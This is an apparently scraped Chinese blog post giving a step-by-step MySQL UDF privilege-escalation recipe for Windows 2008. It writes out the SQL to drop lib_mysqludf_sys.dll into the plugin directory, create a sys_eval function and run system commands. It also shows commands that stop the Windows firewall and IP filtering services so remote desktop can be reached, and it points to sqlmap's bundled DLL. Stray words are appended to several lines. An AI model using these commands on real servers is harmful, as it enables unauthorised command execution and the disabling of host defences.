windows 2008 怎麼利用mysql(5.0)提權?udf.dll提權

上傳dll文件到任意目錄,如:mysql

D:/RECYCLER/lib_mysqludf_sys.dllsql


導入dll,根據版本導入到windows或mysql 插件目錄(通常執行select @@plugin_dir 可看到插件目錄具體路徑):
select load_file(‘D:/RECYCLER/lib_mysqludf_sys.dll’) into dumpfile’c:/windows/lib_mysqludf_sys.dll’
windows

(高版本須要導入上面查詢到的插件目錄)ide


建立function:
create function sys_eval returns string soname ‘lib_mysqludf_sys.dll’;spa


執行命令:
select sys_eval(‘whoami’);插件


通常狀況下不會出現建立不成功哦。blog


連不上3389能夠先中止windows防火牆和篩選ip

select sys_eval(‘net stop policyagent’);
select sys_eval(‘net stop sharedaccess’);get



UDF.DLL下載:string

sqlmap lib_mysqludf_sys.zip


wKioL1PwtJ2xVhAQAASFsA352Bo507.jpg

相關文章
相關標籤/搜索